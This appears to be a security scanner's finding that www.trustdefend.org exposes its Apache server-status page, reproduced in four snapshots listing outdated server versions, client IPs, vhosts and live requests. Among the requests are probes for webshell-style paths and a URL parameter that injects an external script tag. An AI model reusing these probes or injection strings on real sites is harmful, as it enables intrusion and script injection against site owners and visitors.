Domain www.trustdefend.org
Russia
CLOUDFLARENET
Software information

cloudflare cloudflare

tcp/443 tcp/80 tcp/8443

  • Apache server-status page is publicly available
    First seen 2023-08-17 09:20
    Last seen 2024-06-20 02:08
    Open for 307 days
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb4265975cd0

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 20-Jun-2024 05:08:55 MSK
      Restart Time: Thursday, 20-Jun-2024 03:11:10 MSK
      Parent Server Config. Generation: 15
      Parent Server MPM Generation: 14
      Server uptime:  1 hour 57 minutes 44 seconds
      Server load: 10.88 11.50 11.74
      Total accesses: 137530 - Total Traffic: 12.4 GB
      CPU Usage: u8.27 s2.06 cu0 cs0 - .146% CPU load
      19.5 requests/sec - 1.8 MB/second - 94.9 kB/request
      24 requests currently being processed, 0 idle workers
      WWWWWWWWWWWWWWW.WWWW...R.WW..WW.................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-1442890/109/5273W
      0.27800.07.16444.08
      185.240.102.28rspp06.ru:8080GET /wp-includes/admin.php HTTP/1.0
      
      1-145890/103/4864W
      0.241300.074.24422.86
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      2-14128720/0/5140W
      0.02000.00.00496.55
      173.252.83.34khochu-prodat.ru:8080GET /m/link.php?link=603 HTTP/1.0
      
      3-14123390/14/4904W
      0.03000.00.38453.05
      46.101.111.185trustdefend.org:8080GET /server-status HTTP/1.0
      
      4-14124460/8/5354W
      0.01000.00.57391.97
      66.249.79.7cartin.ru:8080GET /dozhdevateli/tovar/dozhdevatel-ostsilliruyushchii-gardena-
      
      5-1473690/26/4870W
      0.065200.01.31344.64
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      6-14302200/169/4636W
      0.38000.020.55362.83
      5.8.49.140ehto.ru:8080POST / HTTP/1.0
      
      7-1474440/62/4812W
      0.16100.03.90413.67
      5.8.49.140ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      8-1455750/96/4285W
      0.25000.014.36374.48
      18.224.51.55ustami-mladenca.ru:8080GET /catalog/detskie-krovatki/gandylyans/red-castle/aton/valle/
      
      9-14124480/8/5011W
      0.01100.00.28375.38
      5.8.49.140ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      10-1415660/100/4385W
      0.221400.064.38595.04
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      11-14125350/8/4213W
      0.01000.00.60494.57
      139.59.136.184poezd-allegro-train.ru:8080GET /login.action HTTP/1.0
      
      12-14125360/6/3998W
      0.01000.00.75462.18
      95.108.213.224mebozon.ru:8080GET /divany?attrb[176]=0-2-10-11-12 HTTP/1.0
      
      13-14125370/4/3813W
      0.01100.00.24438.34
      5.8.49.140ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      14-14125380/9/4131W
      0.01000.00.51362.90
      213.180.203.146xn--80aedtqhfh.xn--p1ai:8080GET /product_info.php?products_id=13275 HTTP/1.0
      
      15-14-0/0/3822.
      0.143100.00.00315.38
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-1447800/98/3359W
      0.26100.05.87292.54
      5.8.49.140ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      17-1460920/75/3949W
      0.19100.03.87322.84
      69.171.249.17khochu-prodat.ru:8080GET /link.php?link=950 HTTP/1.0
      
      18-1422950/126/3258W
      0.29100.021.94429.62
      173.252.83.27naviglon.ru:8080GET /products_new.php?action=buy_now&BUYproducts_id=14638&page=
      
      19-14249190/174/2883W
      0.48100.08.76224.62
      69.171.249.1naviglon.ru:8080GET /products_new.php?action=buy_now&BUYproducts_id=14836&page=
      
      20-14-0/0/3316.
      0.013600.00.00604.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-14-0/0/2981.
      0.103800.00.00273.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-14-0/0/2669.
      0.044400.00.00203.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-1477210/15/3108W
      0.04000.00.52217.86
      213.108.196.4persant.ru:8080GET /mebel-dlya-vannoy/?page=168 HTTP/1.0
      
      24-14-0/0/2809.
      0.083700.00.00215.90
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-1462390/101/2290W
      0.21100.09.87179.95
      95.108.213.241mebozon.ru:8080GET /divany/divan-uglovoj-billund-black HTTP/1.0
      
      26-1490530/51/1989W
      0.12200.02.38147.29
      66.249.66.9naviglon.ru:8080GET /products_new.php?action=wishlist_now&BUYproducts_id=14294&
      
      27-14-0/0/1699.
      0.014700.00.00138.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-14-0/0/1840.
      0.441900.00.00129.62
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-1491490/49/1783W
      0.13000.02.23105.48
      178.176.78.173persant.ru:8080GET /aksessuary/?page=185 HTTP/1.0
      
      30-1491500/56/1160W
      0.12100.04.1674.14
      5.8.49.140ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content//fonts/roboto
      
      31-14-0/0/1114.
      0.004800.00.00234.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-14-0/0/1827.
      0.004100.00.00233.47
      
      Found on 2024-06-20 02:08
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42c0e739b9

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 18-Jun-2024 18:19:55 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 344
      Parent Server MPM Generation: 343
      Server uptime:  11 days 4 hours 39 seconds
      Server load: 10.59 11.77 12.41
      Total accesses: 23030056 - Total Traffic: 2484.4 GB
      CPU Usage: u38.76 s9.72 cu0 cs0 - .00502% CPU load
      23.9 requests/sec - 2.6 MB/second - 113.1 kB/request
      31 requests currently being processed, 5 idle workers
      W_WWWWWWWWWWWW_W......._....W......._.......W.......W...........
      ...W._W.W........W..W..............W...WW..W.W....W..........W..
      ..W...W.........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-343112350/18/663415W
      0.09100.00.7972696.24
      37.187.76.167cescorus.ru:8080GET /wp-json HTTP/1.0
      
      1-343104780/34/657935_
      0.11000.04.3271314.78
      3.128.200.253ustami-mladenca.ru:8080GET /catalog/aksessuari-dla-krovatok/almaz-mebel/sonya/250/imag
      
      2-34393200/30/646220W
      0.071100.03.5671369.02
      213.180.203.54olympic-story.ru:8080GET /?page_id=531 HTTP/1.0
      
      3-343295260/103/641893W
      0.23100.022.0070469.52
      213.180.203.43olympic-story.ru:8080GET /?product=casper-hula-cap-red HTTP/1.0
      
      4-34393840/22/622877W
      0.041500.00.9767363.38
      5.255.231.39olympic-story.ru:8080GET /?add-to-cart=2250 HTTP/1.0
      
      5-343118680/8/622416W
      0.01700.00.2866408.48
      5.255.231.39olympic-story.ru:8080GET /?product=casper-hula-cap-red HTTP/1.0
      
      6-34370220/99/617186W
      0.20000.04.2766922.31
      95.28.168.129xn--44-jlcmylbp.xn--p1ai:8080POST /wp-admin/admin-ajax.php HTTP/1.0
      
      7-34393850/19/605852W
      0.053100.03.6467276.34
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      8-343303780/92/595046W
      0.22000.034.6064480.99
      89.113.156.135ustami-mladenca.ru:8080GET /product/bamper-v-krugluyu-krovatku-nuovita-prestigio HTTP/
      
      9-343119320/15/586781W
      0.04000.03.0363342.94
      213.180.203.14olympic-story.ru:8080GET /?add-to-cart=2211& HTTP/1.0
      
      10-34394530/23/579456W
      0.04600.01.1364153.60
      87.250.224.31olympic-story.ru:8080GET /?product=g2-womens-leather-white HTTP/1.0
      
      11-343119340/18/568038W
      0.04200.01.0662507.81
      185.240.102.28rspp06.ru:8080GET /wp-includes/admin.php HTTP/1.0
      
      12-343120720/11/558848W
      0.01100.00.7860887.80
      213.180.203.54olympic-story.ru:8080GET /?product=mens-nike-tennis-classic& HTTP/1.0
      
      13-343101260/11/549134W
      0.011400.00.4958537.10
      87.250.224.31olympic-story.ru:8080GET /?add-to-cart=2278 HTTP/1.0
      
      14-343304360/136/537327_
      0.330810.013.9457481.37
      52.230.152.5expatboard.ru:8080GET /morocco/marrakech/education/cursos/ HTTP/1.0
      
      15-343122560/15/516578W
      0.01000.00.3256858.09
      91.230.38.92game-unit.ru:8080GET / HTTP/1.0
      
      16-343-0/0/510816.
      0.0511700.00.0055718.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-343-0/0/500691.
      0.1711000.00.0054168.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-343-0/0/491008.
      0.2417000.00.0053802.93
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-343-0/0/468152.
      0.1217500.00.0050321.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-343-0/0/456255.
      0.192700.00.0051707.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-343-0/0/443331.
      0.0016500.00.0048766.24
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-343-0/0/428336.
      0.0213700.00.0047264.15
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-343304950/40/409507_
      0.0702760.02.0945297.69
      93.177.79.163bestcube.space:8080GET /wp-admin/admin-ajax.php?id=2&action=wpshop_views_counter H
      
      24-343-0/0/396803.
      0.058200.00.0044611.87
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-343-0/0/385254.
      0.4711400.00.0041551.92
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-343-0/0/374219.
      0.049700.00.0041571.77
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-343-0/0/357988.
      0.2114200.00.0039802.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-343304980/112/344879W
      0.24000.033.8639231.25
      164.90.228.79trustdefend.org:8080GET /server-status HTTP/1.0
      
      29-343-0/0/332188.
      0.3911200.00.0038370.73
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-343-0/0/328650.
      0.0115800.00.0037473.62
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-343-0/0/308781.
      0.0410900.00.0035080.15
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-343-0/0/303522.
      0.2012400.00.0033781.10
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-343-0/0/287137.
      0.111810
      Found on 2024-06-18 15:19
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42469b2027

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 16-Jun-2024 21:56:35 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 292
      Parent Server MPM Generation: 291
      Server uptime:  9 days 7 hours 37 minutes 19 seconds
      Server load: 24.53 22.57 20.69
      Total accesses: 19208341 - Total Traffic: 2057.0 GB
      CPU Usage: u41.56 s10.34 cu0 cs0 - .00645% CPU load
      23.9 requests/sec - 2.6 MB/second - 112.3 kB/request
      48 requests currently being processed, 4 idle workers
      WWW.WWW..WWWWWWWW_WWWW_W..W.WWWWWW...WWWWW..W.W..WW..W.....W....
      .......W.WW..W.._W....W...W...W.....W........W_.W...............
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-291303970/72/579954W
      0.191300.03.7063181.91
      5.255.231.181olympic-story.ru:8080GET /?add_to_wishlist=2355 HTTP/1.0
      
      1-29182510/2/574268W
      0.00000.00.0462292.36
      95.108.213.139olympic-story.ru:8080GET /?add_to_wishlist=2365& HTTP/1.0
      
      2-291327670/29/564094W
      0.07200.01.7261659.91
      109.184.13.148ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content/fonts/roboto/
      
      3-291-0/0/560717.
      0.16400.00.0061107.76
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      4-29138970/33/542265W
      0.08200.01.8658424.43
      109.184.13.148ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content/fonts/roboto/
      
      5-29158060/26/542074W
      0.06200.02.2657695.89
      109.184.13.148ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content/fonts/roboto/
      
      6-291314060/52/537886W
      0.11000.03.3457913.25
      173.252.107.1naviglon.ru:8080GET /products_new.php?action=buy_now&BUYproducts_id=14531&page=
      
      7-291-0/0/528799.
      0.031100.00.0057764.18
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-291-0/0/517410.
      0.06500.00.0055451.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-291257770/81/510930W
      0.21100.03.4554889.88
      135.125.11.160wordpress-abc.ru:8080GET / HTTP/1.0
      
      10-2913750/31/502421W
      0.085800.00.9155013.63
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-29161380/22/494672W
      0.05400.01.2754246.84
      5.255.231.172olympic-story.ru:8080GET /?add_to_wishlist=2355 HTTP/1.0
      
      12-2913790/41/485457W
      0.09300.02.3152520.49
      5.255.231.181olympic-story.ru:8080GET /?add_to_wishlist=353& HTTP/1.0
      
      13-29170150/15/475971W
      0.03300.00.9050519.76
      213.180.203.223olympic-story.ru:8080GET /?add_to_wishlist=2258 HTTP/1.0
      
      14-29161400/10/464512W
      0.03200.00.7749617.18
      109.184.13.148ehto.ru:8080GET /var/www/seojusru/data/www/ehto.ru/wp-content/fonts/roboto/
      
      15-29162180/31/444397W
      0.08700.01.0948743.31
      213.180.203.236olympic-story.ru:8080GET /?add_to_wishlist=2314& HTTP/1.0
      
      16-29162220/26/441387W
      0.05200.01.4448162.66
      173.252.87.14khochu-prodat.ru:8080GET /link.php?link=10252 HTTP/1.0
      
      17-2914760/75/429640_
      0.18020.04.2746088.13
      213.180.203.17mival.ru:8080GET /robots.txt HTTP/1.0
      
      18-291260660/63/420911W
      0.18000.08.4446269.77
      91.92.244.2zakutsky.com:8080GET /wp-includes/PHPMailer/index.php HTTP/1.0
      
      19-2914770/29/400783W
      0.07000.02.9942726.02
      18.220.9.237ustami-mladenca.ru:8080GET /catalog/detskie-krovatki/briciola/topotushki/papa-karlo/fe
      
      20-2914780/59/389085W
      0.18100.02.7143546.31
      95.108.213.138olympic-story.ru:8080GET /?add_to_wishlist=99&action=yith-woocompare-add-product&id=
      
      21-29162240/28/378954W
      0.06000.01.2541731.17
      64.226.78.121trustdefend.org:8080GET /server-status HTTP/1.0
      
      22-29162260/11/363812_
      0.0206080.01.1940085.33
      18.188.96.5ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      23-29170890/12/345275W
      0.02100.00.6737870.98
      173.252.83.5naviglon.ru:8080GET /products_new.php?action=wishlist_now&BUYproducts_id=14767&
      
      24-291-0/0/334583.
      0.001500.00.0037665.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-291-0/0/324065.
      0.25100.00.0034752.96
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-29171580/3/312779W
      0.00300.00.0034628.82
      91.215.90.152mintim.ru:8080GET /cml1c/01d7e7f3-ef45-446d-ae66-e2412c3a4c6e/?type=catalog&m
      
      27-291-0/0/298664.
      0.061200.00.0033194.88
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-29117830/14/286164W
      0.036400.00.7132236.32
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      29-291261990/52/275146W
      0.14000.03.0931817.79
      90.154.71.59khochu-prodat.ru:8080GET /recpass.php HTTP/1.0
      
      30-29171600/1/272202W
      0.00600.00.0030634.85
      5.255.231.174olympic-story.ru:8080GET /?add_to_wishlist=99 HTTP/1.0
      
      31-291262030/33/253772W
      0.08300.01.9628795.60
      109.184.13.148ehto.ru:8080
      Found on 2024-06-16 18:56
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42086b2d8e

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 13-Jun-2024 03:50:43 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 145
      Parent Server MPM Generation: 144
      Server uptime:  5 days 13 hours 31 minutes 26 seconds
      Server load: 12.96 13.85 13.81
      Total accesses: 11650342 - Total Traffic: 1205.0 GB
      CPU Usage: u19.36 s4.74 cu0 cs0 - .00501% CPU load
      24.2 requests/sec - 2.6 MB/second - 108.5 kB/request
      58 requests currently being processed, 22 idle workers
      __.WW_WWWWGWWW_W_WWWWW_WWW_WWWWWC_WWWWCWWWWWWW__W_W_WWW___WWWW__
      _WWWWW_WW__W_WW.WW..............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-144100370/9/392551_
      0.01026740.00.5241331.01
      192.0.101.226woostore.ru:8080HEAD / HTTP/1.0
      
      1-14499330/21/390334_
      0.05048730.00.6439820.32
      87.250.224.16olympic-story.ru:8080GET /?add_to_wishlist=2255& HTTP/1.0
      
      2-143-0/0/378681.
      0.040569960.00.0040246.71
      185.240.102.28rspp06.ru:8080GET /wp-includes/admin.php HTTP/1.0
      
      3-14499290/9/377783W
      0.01800.00.8440699.00
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      4-144102050/12/366402W
      0.02800.00.4537446.99
      95.108.213.81olympic-story.ru:8080GET /?add_to_wishlist=2367&_wpnonce=9b64e3a316 HTTP/1.0
      
      5-14499340/34/364245_
      0.0709130.01.6037735.21
      3.142.173.232ustami-mladenca.ru:8080GET /catalog/aksessuari-dla-krovatok/138/273/comfortbaby/uoma/3
      
      6-14499370/10/361926W
      0.01700.00.4238668.57
      5.255.231.54olympic-story.ru:8080GET /?add_to_wishlist=353&_wpnonce=9b64e3a316 HTTP/1.0
      
      7-144103940/17/355186W
      0.03100.00.4638840.37
      3.144.99.216ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      8-144105290/3/345076W
      0.00100.00.2135798.09
      213.180.203.97olympic-story.ru:8080GET /?add_to_wishlist=2359& HTTP/1.0
      
      9-144106850/14/342691W
      0.02600.00.2435911.16
      5.255.231.74olympic-story.ru:8080GET /?add_to_wishlist=2262&_wpnonce=9b64e3a316 HTTP/1.0
      
      10-14310150/46/336827G
      0.086000.02.2535344.39
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-144108660/34/328248W
      0.06400.01.5334490.74
      5.255.231.51olympic-story.ru:8080GET /?add_to_wishlist=2358& HTTP/1.0
      
      12-144110270/13/322173W
      0.01100.00.1934193.17
      173.252.87.4khochu-prodat.ru:8080GET /link.php?link=13046 HTTP/1.0
      
      13-144111770/0/314313W
      0.02900.00.0031671.38
      213.180.203.105olympic-story.ru:8080GET /?add_to_wishlist=358 HTTP/1.0
      
      14-144113410/7/303224_
      0.01034770.00.2431760.38
      95.24.159.110khochu-prodat.ru:8080GET / HTTP/1.0
      
      15-144115020/2/289640W
      0.00700.00.0030805.96
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      16-14499310/26/284966_
      0.05052330.00.8730544.15
      5.255.231.113olympic-story.ru:8080GET /?add_to_wishlist=358& HTTP/1.0
      
      17-144116610/5/277380W
      0.01100.01.1728226.37
      5.255.231.61mebozon.ru:8080GET /rossiya/divan-uglovoj-billund-gray-light-s?page=59 HTTP/1.
      
      18-144118280/6/269125W
      0.01000.00.1028934.44
      94.102.51.144art-stories.ru:8080GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cd
      
      19-144118290/13/255382W
      0.04200.00.5627056.27
      213.180.203.207olympic-story.ru:8080GET /?add_to_wishlist=2304 HTTP/1.0
      
      20-144119850/0/243700W
      0.05400.00.0025980.34
      95.108.213.218olympic-story.ru:8080GET /?add_to_wishlist=2269& HTTP/1.0
      
      21-144119860/6/235601W
      0.00100.00.0925690.89
      52.15.123.96ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      22-144119900/11/223183_
      0.02010.00.2724096.05
      74.125.212.174sudamerica.ru:8080GET /images/2024-06-12/82837.jpg HTTP/1.0
      
      23-144119980/3/207549W
      0.00300.00.0621975.87
      5.255.231.157olympic-story.ru:8080GET /?add_to_wishlist=2304& HTTP/1.0
      
      24-144121920/3/198851W
      0.00200.00.0422459.75
      173.252.107.115khochu-prodat.ru:8080GET /link.php?link=10398&d=10398 HTTP/1.0
      
      25-144121930/4/188195W
      0.00100.00.1419381.69
      95.108.213.140mebozon.ru:8080GET /gostinye/stenka-marta-10-valentina?page=7 HTTP/1.0
      
      26-144121950/7/182691_
      0.01010.00.1219111.82
      74.125.212.174sudamerica.ru:8080GET /img/sudamerica.png HTTP/1.0
      
      27-144121960/2/169593W
      0.00100.00.2218623.82
      213.180.203.105olympic-story.ru:8080GET /?add_to_wishlist=2269& HTTP/1.0
      
      28-144121990/1/162796W
      0.00100.00.0217695.54
      185.240.102.28rspp06.ru:8080GET /wp-content/admin.php?520 HTTP/1.0
      
      29-144122010/1/154387W
      0.00300.00.0317214.33
      95.108.213.116olympic-story.ru:8080GET /?add_to_wishlist=2365& HTTP/1.0
      
      30-144122070/10/155473W
      0.02200.00.3017502.63
